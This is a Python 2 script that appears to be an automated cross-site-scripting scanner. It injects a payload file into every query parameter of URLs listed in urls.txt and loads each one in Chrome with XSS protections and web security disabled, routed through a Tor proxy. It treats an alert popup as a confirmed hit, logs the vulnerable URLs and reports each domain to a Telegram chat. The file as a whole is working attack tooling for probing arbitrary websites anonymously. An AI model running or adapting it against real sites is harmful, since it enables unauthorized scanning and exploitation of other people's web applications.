#export PATH=$PATH:/home/.../gecko
 
import urlparse
import requests
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.keys import Keys
import time
import signal
import os
import telepot
import re


global_vectors = list()
global_vectors_overlap = list()
token = ''
last_detected = 'last vuln url'

def get_current_domain(url):
    parsed_uri = urlparse.urlparse(url)
    domain = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)
    return domain   

def log_to_file(filename, text):
    filename = str(filename)
    with open(filename,'a') as file:
        file.write(str(text))
        file.write('\n')
    file.close()
    return  

def read_payload(filename):
    filename = str(filename)
    with open(filename, 'r') as f:
        for line in f:
            return line.split('\n')
            
def count_fuzzed_loops(url):
    parsed_url = urlparse.urlparse(fuzzed_url)
    query_as_dict = urlparse.parse_qs(parsed_url.query)
    return len(query_as_dict)
    
def fuzz_url(fuzzed_url):
    payload =  ''.join(read_payload('payload.test')) 
    
    parsed_url = urlparse.urlparse(fuzzed_url)
    query_as_dict = urlparse.parse_qs(parsed_url.query)
    parametr = []
    value = []

    # buffer arrays
    vector_parametrs = []
    vector_values = []

    level = 0
    # copy parameters and values into 2 arrays
    for i in query_as_dict:
        parametr.insert(level,i)
        value.insert(level,''.join(query_as_dict[i]))
        level += 1

    index = 0 
    perebor = 0
    link = ""
    links = ""
    vectors = list()

    while index < len(query_as_dict):
	    # copy parameters and values in buffer arrays
        for x in range(0, len(query_as_dict)):
            vector_parametrs.insert(x,parametr[x])
            vector_values.insert(x,value[x])
        
        # write payload
        vector_values[perebor] = value[perebor] +''+ payload
        #vector_values[perebor] = payload
    
        # parse links
        for x in reversed(range(0,len(query_as_dict))):
            if x == 0:
                link = vector_parametrs[x] + '=' + vector_values[x]
                links = links + link
            else:
                link =  vector_parametrs[x] + '=' + vector_values[x] + '&'
                links = links + link
        vectors.append(links)
    
        # erase buffer variables and arrays
        link = ""
        links = ""
        del vector_values[:]
        del vector_parametrs[:]
    
        # variable for payload index iterate
        perebor = perebor + 1
    
        index = index + 1
    return vectors

def fuzz_url_overlap(fuzzed_url):
    payload =  ''.join(read_payload('payload.test')) 

    parsed_url = urlparse.urlparse(fuzzed_url)
    query_as_dict = urlparse.parse_qs(parsed_url.query)
    parametr = []
    value = []

    # buffer arrays
    vector_parametrs = []
    vector_values = []

    level = 0
    # copy parameters and values into 2 arrays
    for i in query_as_dict:
        parametr.insert(level,i)
        value.insert(level,''.join(query_as_dict[i]))
        level += 1

    index = 0 
    perebor = 0
    link = ""
    links = ""
    vectors = list()

    while index < len(query_as_dict):
	    # copy parameters and values in buffer arrays
        for x in range(0, len(query_as_dict)):
            vector_parametrs.insert(x,parametr[x])
            vector_values.insert(x,value[x])
        
        # write payload
        #vector_values[perebor] = value[perebor] +''+ payload
        vector_values[perebor] = payload
    
        # parse links
        for x in reversed(range(0,len(query_as_dict))):
            if x == 0:
                link = vector_parametrs[x] + '=' + vector_values[x]
                links = links + link
            else:
                link =  vector_parametrs[x] + '=' + vector_values[x] + '&'
                links = links + link
        vectors.append(links)
    
        # erase buffer variables and arrays
        link = ""
        links = ""
        del vector_values[:]
        del vector_parametrs[:]
    
        # variable for payload index iterate
        perebor = perebor + 1
    
        index = index + 1
    return vectors
   
def fuzz():
    global global_vectors
    global token
    global last_detected
    for x in global_vectors:
        browser = init_browser()
        attack_url = parsed_url.scheme + '://' +  parsed_url.netloc + parsed_url.path + '?' + x
        print "attack_url = ",attack_url
        domain = ''.join(attack_url)
        print "domain = ",get_current_domain(domain) 
        try:
            r = requests.head(get_current_domain(domain))
            print(r.status_code)
            status = r.status_code
        # prints the int of the status code
        except requests.ConnectionError:
            print("failed to connect")
            status = "error"
        log_to_file("requests.log",str(status) +' : ' + get_current_domain(domain)) 
        try:
            browser.get(attack_url)
        except:
	        pass
        domain_name_to_screen = get_current_domain(domain)
        domain_name_to_screen = domain_name_to_screen.replace('/','')
        domain_name_to_screen = domain_name_to_screen.replace(':','')

        print "screen+name = ", domain_name_to_screen
        screen_filename =  domain_name_to_screen + '_' + time.strftime("%Y%m%d-%H%M%S") + '_screen.png'
        #browser.get_screenshot_as_file(screen_filename)
        try:
            browser.find_the_element_by_id("add_button").click() 
        except:
			pass

        log_to_file("fuzzed_urls.txt",attack_url)
        log_to_file("fuzzed_urls.txt",screen_filename)
        log_to_file("fuzzed_urls.txt","-------------------------------------------")
        
        try:
            WebDriverWait(browser, 3).until(EC.alert_is_present(),
                                   'Timed out waiting for PA creation ' +
                                   'confirmation popup to appear.')
            try:
                alert = browser.switch_to_alert()
                alert.accept()    
            except:
                pass
            print "ALERT ACCEPTED"

            log_to_file("vectors.txt",attack_url)
            log_to_file("vectors.txt",screen_filename)
            log_to_file("vectors.txt","-------------------------------------------")

            print "test last",last_detected
            print "test current",get_current_domain(domain)

            if (last_detected not in get_current_domain(domain)):
                TelegramBot = telepot.Bot(token)
                TelegramBot.sendMessage('3072759','https://www.openbugbounty.org/search/?search='+get_current_domain(domain)+'&type=host')
                print "send message to telegramm"
                last_detected = get_current_domain(domain)
            print "-------------------------------------------"
        except:
            print "NOPE"
            print "-------------------------------------------"
            try:
                browser.get_screenshot_as_file("./images/" + screen_filename)
            except:
                pass

        #watchdog label
        try:
            browser.close()
            browser.quit()
        except:
            pass
        os.system("killall chromium-browser")
        os.system("sh kill-chrome.sh")
        time.sleep(5)
        open("time.tmp", 'w').close()
        timestamp = time.strftime("%H:%M:%S")
        print "time = ",timestamp
        log_to_file("time.tmp",timestamp) 

         

# clean tmp file and save timestamp

open("time.tmp", 'w').close()
timestamp = time.strftime("%H:%M:%S")
print "time = ",timestamp
log_to_file("time.tmp",timestamp) 

log_file = []

with open('fuzzed_urls.log', 'r') as l:
    for log_line in l:
        log_file.append(log_line.strip('\n'))


def init_browser():
    chrome_options = webdriver.ChromeOptions()
    chrome_options.add_argument('--proxy-server=socks5://127.0.0.1:9050')
    chrome_options.add_argument('--disable-xss-auditor')
    chrome_options.add_argument('--disable-web-security')
    chrome_options.add_argument('--enable-devtools-experiments')
    chrome_options.add_argument('--disable-images')
    chrome_options.add_argument('--disable-background-mode')
    #chrome_options.add_argument('--headless')
    #chrome_options.add_argument('--disable-background-timer-throttling')
    browser = webdriver.Chrome('/usr/bin/chromedriver')
    browser = webdriver.Chrome(chrome_options=chrome_options)
    browser.set_page_load_timeout(30)
    return browser


with open('urls.txt', 'r') as f:
    for line in f:
        if line.strip('\n') not in log_file:
            print line
        
            url_to_parse = line
       
            parsed_url = urlparse.urlparse(url_to_parse)
        
            global_vectors = fuzz_url(url_to_parse)
            global_vectors_overlap = fuzz_url_overlap(url_to_parse)
        
            global_vectors = global_vectors + global_vectors_overlap
            
            log_to_file("fuzzed_urls.log",line)
            
            #fuzz(browser)
            #fuzz(init_browser())
            fuzz()
            
        
            del global_vectors[:]
            del global_vectors_overlap[:]

#browser.close()
#browser.quit()
